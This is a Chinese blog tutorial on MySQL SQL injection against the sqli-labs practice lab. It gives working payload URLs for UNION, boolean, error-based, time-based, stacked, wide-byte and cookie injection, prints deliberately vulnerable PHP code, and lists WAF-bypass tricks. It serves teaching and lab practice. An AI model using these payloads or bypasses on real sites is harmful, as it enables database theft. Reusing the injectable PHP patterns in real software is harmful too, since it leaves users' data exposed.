<!DOCTYPE html>
<html lang="en">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/apple-touch-icon.png">
  <link rel="icon" type="image/png" href="/img/favicon.ico">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>Web安全之SQL注入 ~ Ca1ma&#39;s blog</title>

  <link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/5.10.2/css/all.min.css"  >
<link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.3.1/css/bootstrap.min.css"  >
<link rel="stylesheet" href="https://cdn.staticfile.org/mdbootstrap/4.8.9/css/mdb.min.css"  >
<link rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/3.0.1/github-markdown.min.css"  >

<link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">



  <link rel="stylesheet" href="/lib/prettify/tomorrow-night-eighties.min.css"  >

<link rel="stylesheet" href="/css/main.css"  >


  <link rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css"  >


<meta name="generator" content="Hexo 4.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Ca1ma's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">Home</a>
          </li>
        
          
          
          
          
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">Tags</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">About</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background"
         style="background: url('/img/programming/1.jpg')no-repeat center center;
           background-size: cover;
           background-attachment: fixed;">
      <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              <br>
              
                <p class="mt-3">
                  <i class="fas fa-calendar-alt" aria-hidden="true"></i>&nbsp;
                  Thursday, February 20th 2020, 9:13 pm
                </p>
              

              <p>
                

                

                
              </p>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="py-5 z-depth-3" id="board">
        <div class="post-content mx-auto" id="post">
          <div class="markdown-body">
            <h1 id="0x00-数据库基础"><a href="#0x00-数据库基础" class="headerlink" title="0x00 数据库基础"></a>0x00 数据库基础</h1><blockquote>
<p>在MySQL5.0版本之后，MySQL默认在数据库中存放一个<code>information_schema</code>的数据库，在该库中，需要记住三个表名，分别是<code>SCHEMATA</code>，<code>TABLES</code>和<code>COLUMNS</code>。</p>
</blockquote>
<h2 id="常用表"><a href="#常用表" class="headerlink" title="常用表"></a>常用表</h2><h3 id="1-SCHEMATA-表"><a href="#1-SCHEMATA-表" class="headerlink" title="1. SCHEMATA 表"></a>1. SCHEMATA 表</h3><p>该表中存放该用户创建的所有的数据库的库名，字段为 <code>SCHEMA_NAME</code>。</p>
<p><img src="/img/page/image-20200228222337940.png" srcset="/img/loading.gif" alt="image-20200228222337940"></p>
<h3 id="2-TABLES-表"><a href="#2-TABLES-表" class="headerlink" title="2. TABLES 表"></a>2. TABLES 表</h3><p>该表中存放该用户创建的所有的数据库的库名和表名，字段为 <code>TABLE_SCHEMA</code> ，<code>TABLES_NAME</code>。</p>
<p><img src="/img/page/image-20200228223129025.png" srcset="/img/loading.gif" alt="image-20200228223129025"> </p>
<h3 id="3-COLUMNS-表"><a href="#3-COLUMNS-表" class="headerlink" title="3. COLUMNS 表"></a>3. COLUMNS 表</h3><p>该表中存放该用户创建的所有的数据库的库名，表名和字段名。字段为<code>TABLE_SCHEMA</code>，<code>TABLE_NAME</code>和<code>COLUMN_NAME</code>。</p>
<p><img src="/img/page/image-20200228223722717.png" srcset="/img/loading.gif" alt="image-20200228223722717"></p>
<h2 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h2><h3 id="系统常用函数"><a href="#系统常用函数" class="headerlink" title="系统常用函数"></a>系统常用函数</h3><ul>
<li>database()  当前网站使用的数据库</li>
<li>version()  当前MySQL的版本</li>
<li>user()  当前MySQL的用户</li>
</ul>
<h2 id="注释符"><a href="#注释符" class="headerlink" title="注释符"></a>注释符</h2><p>在MySQl中的注释符的表达方式： </p>
<ul>
<li>— </li>
<li>#</li>
<li>/<em> 注释 </em>/</li>
<li>/*! 内联注释 */</li>
</ul>
<h2 id="MySQL-查询语句"><a href="#MySQL-查询语句" class="headerlink" title="MySQL 查询语句"></a>MySQL 查询语句</h2><h3 id="1-在不知道任何条件时，语句如下："><a href="#1-在不知道任何条件时，语句如下：" class="headerlink" title="1. 在不知道任何条件时，语句如下："></a>1. 在不知道任何条件时，语句如下：</h3><p><code>select 要查询的字段名 from 库名.表名</code></p>
<p><img src="/img/page/image-20200229115904730.png" srcset="/img/loading.gif" alt="image-20200229115904730"></p>
<h3 id="2-在知道一条已知条件时，语句如下："><a href="#2-在知道一条已知条件时，语句如下：" class="headerlink" title="2. 在知道一条已知条件时，语句如下："></a>2. 在知道一条已知条件时，语句如下：</h3><p><code>select 要查询的字段名 from 库名.表名 where 已知条件的字段名=&#39;已知条件的值&#39;</code></p>
<p><img src="/img/page/image-20200229121200138.png" srcset="/img/loading.gif" alt="image-20200229121200138"></p>
<h3 id="3-在知道两条已知条件时，语句如下："><a href="#3-在知道两条已知条件时，语句如下：" class="headerlink" title="3. 在知道两条已知条件时，语句如下："></a>3. 在知道两条已知条件时，语句如下：</h3><p><code>select 要查询的字段名 from 库名.表名 where 已知条件1的字段名=&#39;已知条件1的值&#39; and 已知条件2的字段名=&#39;已知条件2的值&#39;</code></p>
<p><img src="/img/page/image-20200229122419602.png" srcset="/img/loading.gif" alt="image-20200229122419602"></p>
<h3 id="4-limit用法"><a href="#4-limit用法" class="headerlink" title="4. limit用法"></a>4. limit用法</h3><p>limit的使用格式为 <code>limit m n</code> ，其中m是记录开始的位置，从0开始，表示第一条记录，n是指取n条记录</p>
<p>不使用limit的表示:</p>
<p><img src="/img/page/image-20200229122956596.png" srcset="/img/loading.gif" alt="image-20200229122956596"></p>
<p>使用limit的表示：</p>
<p><img src="/img/page/image-20200229123037844.png" srcset="/img/loading.gif" alt="image-20200229123037844"></p>
<h1 id="0x01-SQL注入基础"><a href="#0x01-SQL注入基础" class="headerlink" title="0x01 SQL注入基础"></a>0x01 SQL注入基础</h1><blockquote>
<p>SQl注入就是指web应用程序对用户输入数据的合法性没有判断，前端传入后端的参数是攻击者可控的，并且参数带入数据库查询，攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作</p>
</blockquote>
<h3 id="SQL注入原理"><a href="#SQL注入原理" class="headerlink" title="SQL注入原理"></a>SQL注入原理</h3><ul>
<li>参数用户可控：前端传给后端的参数内容是用户可以控制的。</li>
<li>参数带入数据库查询：传入的参数拼接到SQL语句，并且带入数据库查询。</li>
</ul>
<h1 id="0x02-UNION-注入"><a href="#0x02-UNION-注入" class="headerlink" title="0x02 UNION 注入"></a>0x02 UNION 注入</h1><p>我们用sqli-labs靶场作为例子来说明：</p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-1/?id=1</code></p>
<p><img src="/img/page/image-20200229195209204.png" srcset="/img/loading.gif" alt="image-20200229195209204"></p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-1/?id=1&#39;+--+</code></p>
<p><img src="/img/page/image-20200229195331335.png" srcset="/img/loading.gif" alt="image-20200229195331335"></p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-1/?id=1&#39;+and+1=1--+</code></p>
<p><img src="/img/page/image-20200229195537219.png" srcset="/img/loading.gif" alt="image-20200229195537219"></p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-1/?id=1&#39;+and+1=2--+</code></p>
<p><img src="/img/page/image-20200229195620293.png" srcset="/img/loading.gif" alt="image-20200229195620293"></p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-1/?id=1&#39;+order+by+2--+</code></p>
<p><img src="/img/page/image-20200229195800425.png" srcset="/img/loading.gif" alt="image-20200229195800425"></p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-1/?id=1&#39;+order+by+3--+</code></p>
<p><img src="/img/page/image-20200229195848738.png" srcset="/img/loading.gif" alt="image-20200229195848738"></p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-1/?id=1&#39;+order+by+4--+</code></p>
<p><img src="/img/page/image-20200229195931426.png" srcset="/img/loading.gif" alt="image-20200229195931426"></p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-1/?id=1&#39;+union+select+1,2,3--+</code></p>
<p><img src="/img/page/image-20200229200158987.png" srcset="/img/loading.gif" alt="image-20200229200158987"></p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-1/?id=-1&#39;+union+select+1,2,3--+</code></p>
<p><img src="/img/page/image-20200229200253212.png" srcset="/img/loading.gif" alt="image-20200229200253212"></p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-1/?id=-1&#39;+union+select+1,database(),version()--+</code></p>
<p><img src="/img/page/image-20200229200405405.png" srcset="/img/loading.gif" alt="image-20200229200405405"></p>
<p>得到数据库的库名和数据库的版本号之后可以用我们上面说的语句得到表名，字段名等信息</p>
<h1 id="0x03-Boolean-注入"><a href="#0x03-Boolean-注入" class="headerlink" title="0x03 Boolean 注入"></a>0x03 Boolean 注入</h1><p>boolean注入可以用sqli-labs的第8关来作演示：</p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-8/?id=1</code></p>
<p><img src="/img/page/image-20200229201210520.png" srcset="/img/loading.gif" alt="image-20200229201210520"></p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-8/?id=1&#39;</code></p>
<p><img src="/img/page/image-20200229201300671.png" srcset="/img/loading.gif" alt="image-20200229201300671"></p>
<p>由上面两张图可以看出，它只有两种显示结果，而没有返回其他数据库中的数据，因此在这里不能使用UNION注入。这里可以使用Boolean注入</p>
<blockquote>
<p>Boolean注入是指构造SQL判断语句，通过查看页面返回结果来推测那些SQL判断条件是成立的，以此获取数据库中的数据。</p>
</blockquote>
<p>由于我们在上面已经知道了该数据库的库名为<code>security</code></p>
<p>所以我们用构造判断库名的长度</p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-8/?id=1&#39;+and+length(database())&gt;=1--+</code></p>
<p><img src="/img/page/image-20200229202723521.png" srcset="/img/loading.gif" alt="image-20200229202723521"></p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-8/?id=1&#39;+and+length(database())&gt;=8--+</code></p>
<p><img src="/img/page/image-20200229202823994.png" srcset="/img/loading.gif" alt="image-20200229202823994"></p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-8/?id=1&#39;+and+length(database())&gt;=9--+</code></p>
<p><img src="/img/page/image-20200229202905310.png" srcset="/img/loading.gif" alt="image-20200229202905310"></p>
<p>下面可以用<code>substr()</code>函数来爆出数据库的库名</p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-8/?id=1&#39;+and+substr(database(),1,1)=&#39;a&#39;+--+</code></p>
<p><img src="/img/page/image-20200229203401402.png" srcset="/img/loading.gif" alt="image-20200229203401402"></p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-8/?id=1&#39;+and+substr(database(),1,1)=&#39;s&#39;+--+</code></p>
<p><img src="/img/page/image-20200229203539472.png" srcset="/img/loading.gif" alt="image-20200229203539472"></p>
<blockquote>
<p>substr是截取的意思，其意思是截取database()的值，从第一个字符开始，每次只返回一个。</p>
<p>substr和limit的用法类似，需要注意的是，limit是从0开始排序，而substr是从1开始排序</p>
</blockquote>
<p>可以使用burp爆破模块爆破数据库的库名</p>
<p>还可以使用<code>ord()</code>函数</p>
<blockquote>
<p>在MySQL中，ord可以进行ASCII码转换</p>
</blockquote>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-8/?id=1&#39;+and+ord(substr(database(),1,1))=115+--+</code></p>
<p><img src="/img/page/image-20200229204140587.png" srcset="/img/loading.gif" alt="image-20200229204140587"></p>
<h1 id="0x04-报错注入"><a href="#0x04-报错注入" class="headerlink" title="0x04 报错注入"></a>0x04 报错注入</h1><p>MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数，分别是ExtractValue()和UpdateXML()</p>
<blockquote>
<p>UPDATEXML (XML_document, XPath_string, new_value);<br>第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc<br>第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。<br>第三个参数：new_value，String格式，替换查找到的符合条件的数据<br>作用：改变文档中符合条件的节点的值</p>
</blockquote>
<p>报错注入可以使用sqli-labs中的第二关,第二关是数字型注入</p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-2/?id=1+and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)</code></p>
<p><img src="/img/page/image-20200301124413701.png" srcset="/img/loading.gif" alt="image-20200301124413701"></p>
<p>剩下的就可以使用如下语句进行测试：</p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-2/?id=1+and+updatexml(1,concat(0x7e,(select+schema_name+from+information_schemata+limit+0,1),0x7e),1)</code></p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-2/?id=1+and+updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),0x7e),1)</code></p>
<p>因为<code>updatexml()</code>最多只能显示32位，这是需要配合<code>substr()</code>使用。</p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-2/?id=1+and+updatexml(1,concat(0x7e,substr((select+database()),1,25),0x7e),1)</code></p>
<h1 id="0x05-时间注入"><a href="#0x05-时间注入" class="headerlink" title="0x05 时间注入"></a>0x05 时间注入</h1><blockquote>
<p>时间注入和boolean注入类似，时间注入利用sleep()或benchmark()等函数让MySQL的执行时间变长。</p>
<p>时间注入多与 if(expr1, expr2, expr3)结合使用，if语句的含义：</p>
<p>如果expr1是true，则if()的返回值为expr2；否则返回值为expr3。</p>
</blockquote>
<p>例如：<code>if (length(database())&gt;1,sleep(5),1)</code></p>
<p>如果数据库的库名长度大于，则MySQL查询休眠5秒，否则查询1，而查询1的结果，大约只有几十毫秒。</p>
<p><img src="/img/page/image-20200301130905440.png" srcset="/img/loading.gif" alt="image-20200301130905440"></p>
<p>从上图看出正常执行一个查询的时间是2s左右。</p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-2/?id=1&#39;+and+if(length(database())&gt;1,sleep(5),1)--+</code></p>
<p><img src="/img/page/image-20200301131114678.pn" srcset="/img/loading.gif" alt="image-20200301131114678"></p>
<p>现在差不多是7s，休眠了5s。</p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-2/?id=1&#39;+and+if(length(database())&lt;2,sleep(5),1)--+</code></p>
<p><img src="/img/page/image-20200301131356473.png" srcset="/img/loading.gif" alt="image-20200301131356473"></p>
<p>可能是我电脑的原因这个在数据库的库名长度小于2的时候跟正常执行差不多，也是2s，不过根据这个也可以判断出它是不满足第一个条件的。</p>
<p>在上面我们知道了这个数据库的库名为security，我们测试一下第一个字母：</p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-2/?id=1&#39;+and+if(substr(database(),1,1)=&#39;s&#39;,sleep(5),1)--+</code></p>
<p><img src="/img/page/image-20200301131939933.png" srcset="/img/loading.gif" alt="image-20200301131939933"></p>
<p><code>http://www.vulhublabs.com/sqli-labs/Less-2/?id=1&#39;+and+if(substr(database()，1，1)=&#39;a&#39;,sleep(5),1)--+</code></p>
<p><img src="/img/page/image-20200301132036043.png" srcset="/img/loading.gif" alt="image-20200301132036043"></p>
<p>依此类推就可以得出其他的数据了。</p>
<h1 id="0x06-堆叠注入"><a href="#0x06-堆叠注入" class="headerlink" title="0x06 堆叠注入"></a>0x06 堆叠注入</h1><blockquote>
<p>堆叠注入源自于堆叠查询</p>
<p>堆叠查询可以执行多条语句，多语句之间以分号隔开。堆叠注入就是利用这个特点，在第二个SQL语句中构造自己要执行的语句。</p>
</blockquote>
<p>在堆叠查询有时会用到show语句：</p>
<blockquote>
<p>show columns from class; #返回当前表的列<br>show tables;  #显示数据库中的列表<br>show databases; #显示MySQL中的列表<br>show create database school; #显示创建数据库的语句<br>show create table class; #显示创建数据表的语句<br>show grants; #显示授予用户的安全权限<br>show errors 或 show warnings; #用来显示服务器错误或警告消息</p>
<p>进一步了解show 请在mysql命令行实用程序中，执行命令 help show;显示允许的show语句</p>
</blockquote>
<p>堆叠注入的漏洞源码：</p>
<pre><code class="lang-php">&lt;?php
header(&quot;Content-Type: text/html;charset=utf-8&quot;);
try {
    $conn = new PDO(&quot;mysql:host=localhost;dbname=security&quot;, &quot;root&quot;, &quot;root&quot;);//连接数据库，初始化一个pdo对象
    $conn-&gt;setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);//设置一个属性
    $id = $_GET[&#39;id&#39;];
    $sql = &quot;select * from users where id=$id&quot;;
    echo &quot;&lt;hr /&gt;&quot;;
    echo &quot;当前执行语句为：&quot;.$sql;
    echo &quot;&lt;hr /&gt;&quot;;

    $stmt = $conn-&gt;query($sql);

    $result = $stmt-&gt;setFetchMode(PDO::FETCH_ASSOC);
    foreach($stmt-&gt;fetchAll() as $k=&gt;$v) {
        foreach ($v as $key =&gt; $value) {
            echo $value;
        }
    }
    $dsn = null;
}
catch(PDOException $e)
{
    echo &quot;error&quot;;
}
$conn = null;
?&gt;
</code></pre>
<p>使用PDO执行SQL语句时，可以执行多条语句，这样通常不能直接得到注入结果，因为PDO指挥返回第一条SQL语句的执行结果，所以在第二条语句中可以用update更新数据或者使用时间盲注获取数据。</p>
<p>访问 <code>http://www.vulhublabs.com/zjbc/sqli/kuanzifu.php?id=1;select+if(substr(database(),1,1)=&#39;a&#39;,sleep(5),1);</code></p>
<p><img src="/img/page/image-20200310134007916.png" srcset="/img/loading.gif" alt="image-20200310134007916"></p>
<p><code>http://www.vulhublabs.com/zjbc/sqli/kuanzifu.php?id=1;select+if(substr(database(),1,1)=&#39;s&#39;,sleep(5),1);</code></p>
<p><img src="img/page/image-20200310134226637.png" srcset="/img/loading.gif" alt="image-20200310134226637"></p>
<p>堆叠注入剩余就可以和Boolean注入，时间注入等相结合。</p>
<p>这里推荐一道题为 <strong>2019强网杯</strong> 在 Buuctf上有复现环境。</p>
<h1 id="0x07-宽字节注入"><a href="#0x07-宽字节注入" class="headerlink" title="0x07 宽字节注入"></a>0x07 宽字节注入</h1><p>宽字节的注入在网上找了一个漏洞源码，源码如下：</p>
<pre><code class="lang-php">&lt;?php

$conn = mysql_connect(&#39;localhost&#39;, &#39;root&#39;, &#39;root&#39;) or die(&#39;bad!&#39;);
mysql_select_db(&#39;security&#39;, $conn) OR emMsg(&quot;数据库连接失败&quot;);
mysql_query(&quot;SET NAMES &#39;gbk&#39;&quot;,$conn);

$id = addslashes($_GET[&#39;id&#39;]);
$sql=&quot;SELECT * FROM users WHERE id=&#39;$id&#39; LIMIT 0,1&quot;;
$result = mysql_query($sql, $conn) or die(mysql_error()); 
$row = mysql_fetch_array($result);

    if($row)
    {
      echo $row[&#39;username&#39;] . $row[&#39;password&#39;];
      }
    else 
    {
    print_r(mysql_error());
    }      

?&gt;
&lt;/font&gt; 
&lt;?php

echo &quot;&lt;br&gt;The Query String is : &quot;.$sql .&quot;&lt;br&gt;&quot;;

?&gt;
</code></pre>
<p>访问 <code>http://www.vulhublabs.com/zjbc/sqli/kuanzifu.php?id=1&#39;</code></p>
<p><img src="/img/page/image-20200310123122580.png" srcset="/img/loading.gif" alt="image-20200310123122580"></p>
<p>从上图我们可以看出多了一个转义符(反斜杠)，说明它把 <code>&#39;</code> 转义为 <code>\&#39;</code> ，导致参数id无法逃逸单引号的包围，所以在一般情况下，这里是不存在SQL注入的。</p>
<p>但是有个特例，就是当数据库的编码为GBK时，可以使用宽字节注入</p>
<p>宽字节的格式是在地址后面先加一个 <code>%df</code> ，在加单引号，因为反斜杠的url编码为 <code>%5c</code> ，而在GBK编码中，<code>%df%5c</code> 为繁体字 <code>運</code> ，所以这时，单引号就成功逃逸。</p>
<p><code>http://www.vulhublabs.com/zjbc/sqli/kuanzifu.php?id=1%df&#39;+--+</code></p>
<p><img src="/img/page/image-20200310132701563.png" srcset="/img/loading.gif" alt="image-20200310132701563"></p>
<p><code>http://www.vulhublabs.com/zjbc/sqli/kuanzifu.php?id=1%df&#39;+and+1=1--+</code></p>
<p><img src="/img/page/image-20200310132751443.png" srcset="/img/loading.gif" alt="image-20200310132751443"></p>
<p><code>http://www.vulhublabs.com/zjbc/sqli/kuanzifu.php?id=1%df&#39;+and+1=2--+</code></p>
<p><img src="/img/page/image-20200310132858218.png" srcset="/img/loading.gif" alt="image-20200310132858218"></p>
<p>剩下就可以使用Union注入了。</p>
<h1 id="0x08-cookie注入"><a href="#0x08-cookie注入" class="headerlink" title="0x08 cookie注入"></a>0x08 cookie注入</h1><p>我们先看一下cookie注入的源码：</p>
<pre><code class="lang-php">&lt;?php
  $id = $_COOKIE[&#39;id&#39;];
  $value = &quot;1&quot;;
  setcookie(&quot;id&quot;,$value);
  $con=mysqli_connect(&quot;localhost&quot;,&quot;root&quot;,&quot;root&quot;,&quot;security&quot;);
  if (mysqli_connect_errno())
  {
      echo &quot;连接失败: &quot; . mysqli_connect_error();
  }
  $result = mysqli_query($con,&quot;select * from users where `id`=&quot;.$id);
  if (!$result) {
    printf(&quot;Error: %s\n&quot;, mysqli_error($con));
    exit();
  }
  $row = mysqli_fetch_array($result);
  echo $row[&#39;username&#39;] . &quot; : &quot; . $row[&#39;password&#39;];
  echo &quot;&lt;br&gt;&quot;;
?&gt;
</code></pre>
<p>访问 <code>http://www.vulhublabs.com/zjbc/sqli/cookie.php</code> ，尝试用burp抓包</p>
<p><img src="/img/page/image-20200311182856723.png" srcset="/img/loading.gif" alt="image-20200311182856723"></p>
<p>可以看出在cookie存在参数id，将<code>id=1</code> ==&gt; <code>id=1&#39;</code></p>
<p><img src="/img/page/image-20200311183119751.png" srcset="/img/loading.gif" alt="image-20200311183119751"></p>
<p>我们会发现页面返回错误，再试着将 <code>id=1&#39;</code> ==&gt; <code>id=1 and 1=1</code></p>
<p><img src="/img/page/image-20200311183349400.png" srcset="/img/loading.gif" alt="image-20200311183349400"></p>
<p>再将 <code>id=1 and 1=1</code> ==&gt; <code>id=1 and 1=2</code></p>
<p><img src="/img/page/image-20200311183500451.png" srcset="/img/loading.gif" alt="image-20200311183500451"></p>
<p>剩下就可以使用Union注入的方式来获取数据了。</p>
<h1 id="0x09-SQL注入绕过"><a href="#0x09-SQL注入绕过" class="headerlink" title="0x09 SQL注入绕过"></a>0x09 SQL注入绕过</h1><p>有时候程序员会采取各种防注入的手段，这时候我们会尝试一些绕过的手段</p>
<ul>
<li><p>大小写绕过</p>
<p>eg:  And，OrdeR By，SelEct…</p>
</li>
<li><p>双写绕过</p>
<p>eg:  anandd，ororderder bbyy，sselectelect…</p>
</li>
<li><p>编码绕过</p>
<p>这里需要说明一下：</p>
<blockquote>
<p>在发现关键词被拦截后，尝试使用URL全编码的方式绕过拦截。由于服务器会自动对URL进行一次URL解码，所以需要把关键词编码两次。</p>
<p>Notice：URL编码需要选择全编码，而不是普通的URL编码</p>
</blockquote>
<p>eg:   <code>and</code> ==&gt; <code>%25%36%31%25%36%65%25%36%34</code></p>
</li>
<li><p>内联注释绕过</p>
<p>eg:  <code>id=1 /*!and*/ 1=1</code> ，<code>id=1 /*!and*/ 1=2</code> …</p>
</li>
</ul>
<h1 id="0x10-参考资料"><a href="#0x10-参考资料" class="headerlink" title="0x10 参考资料"></a>0x10 参考资料</h1><ul>
<li>徐焱 《Web安全攻防-渗透测试实战指南》</li>
</ul>

            <hr>
          </div>
          <br>
          <div>
            <p>
            
            
              <span>
                <i class="iconfont icon-tag"></i>
                
                  <a class="hover-with-bg" href="/tags/SQL%E6%B3%A8%E5%85%A5">SQL注入</a>
                
                  <a class="hover-with-bg" href="/tags/web%E5%AE%89%E5%85%A8">web安全</a>
                
              </span>
            
            </p>
            
              <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" target="_blank" rel="nofollow noopener noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
            
          </div>
        </div>
      </div>
    </div>
    <div class="d-none d-lg-block col-lg-2 toc-container">
      
  <div id="toc">
    <p class="h4"><i class="far fa-list-alt"></i>&nbsp;TOC</p>
    <div id="tocbot"></div>
  </div>

    </div>
  </div>
</div>

<!-- custom -->


<!-- Comments -->
<div class="col-lg-7 mx-auto nopadding-md">
  <div class="container comments mx-auto" id="comments">
    
  </div>
</div>

    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  <footer class="mt-5">
  <div class="text-center py-3">
    <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
    <i class="iconfont icon-love"></i>
    <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"> <b>Fluid</b></a>
    <br>

    
  
    <!-- 不蒜子统计PV -->
    
    &nbsp;<span id="busuanzi_container_site_pv">总访问量 
          <span id="busuanzi_value_site_pv"></span> 次</span>&nbsp;
  
  
    <!-- 不蒜子统计UV -->
    
    &nbsp;<span id="busuanzi_container_site_uv">总访客数 
            <span id="busuanzi_value_site_uv"></span> 人</span>&nbsp;
  
  <br>



    


    <!-- cnzz Analytics icon -->
    

  </div>
</footer>

<!-- SCRIPTS -->
<script src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script src="https://cdn.staticfile.org/popper.js/1.15.0/umd/popper.min.js" ></script>
<script src="https://cdn.staticfile.org/twitter-bootstrap/4.3.1/js/bootstrap.min.js" ></script>
<script src="https://cdn.staticfile.org/mdbootstrap/4.8.9/js/mdb.min.js" ></script>
<script src="/js/main.js" ></script>


  <script src="/js/lazyload.js" ></script>



  
    <script src="https://cdn.staticfile.org/tocbot/4.8.0/tocbot.min.js" ></script>
  
  <script src="/js/post.js" ></script>



  <script src="https://cdn.staticfile.org/smooth-scroll/16.1.0/smooth-scroll.min.js" ></script>



  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>


<!-- Plugins -->


  

  
    <!-- Google Analytics -->
    <script>
      (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
          (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o),
          m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
      })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');

      ga('create', 'UA-155576554-1', 'auto');
      ga('send', 'pageview');
    </script>
  

  

  

  <!-- cnzz Analytics -->
  



  <script src="https://cdn.staticfile.org/prettify/r298/prettify.min.js" ></script>
  <script>
    $(document).ready(function () {
      $('pre').addClass('prettyprint  linenums');
      prettyPrint();
    })
  </script>



  <script src="https://cdn.staticfile.org/typed.js/2.0.10/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "Web安全之SQL注入&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script src="https://cdn.staticfile.org/anchor-js/4.2.0/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "left",
      visible: "true",
      
      icon: "#"
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



